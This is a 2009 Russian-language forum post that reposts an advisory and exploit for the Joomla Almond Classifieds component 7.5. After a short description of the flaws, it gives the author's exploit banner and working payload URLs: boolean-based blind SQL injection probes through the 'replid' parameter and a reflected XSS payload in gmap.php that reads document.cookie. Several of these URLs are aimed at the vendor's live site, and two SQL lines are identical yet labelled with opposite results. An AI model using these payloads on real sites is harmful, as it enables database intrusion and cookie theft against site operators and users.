28.07.2009, 17:48
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами:
9030789
Репутация:
704
|
|
Joomla Almond Classifieds Component SQL Injection and Cross-Site Scripting
Description:
Moudi has reported some vulnerabilities in the Almond Classifieds component for Joomla, which can be exploited by malicious people to conduct SQL injection and cross-site scripting attacks.
1) Input passed via the "replid" to index.php (when "option" is set to "com_aclassf", "Itemid" is set to a valid id, "ct" to "manw_repl" and "md" is set to "add_form") is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "addr" parameter to components/com_aclassf/gmap.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 7.5. Other versions may also be affected.
Код:
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ /___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[�] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[�] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
==============================================================================
[�] Script: [ Joomla Almond Classifieds v.7.5 ]
[�] Language: [ PHP ]
[�] Download: [ http://www.almondsoft.com ]
[�] Founder: [ Moudi <m0udi@9.cn> ]
[�] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[�] Team: [ EvilWay ]
[�] Dork: [ OFF ]
[�] Price: [ $195 ]
[�] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===
[�] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> TRUE
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> FALSE
===[ Exploit XSS + LIVE : vulnerability ]===
[�] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]
[�] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>
Author: Moudi
###########################################################################
|
|
|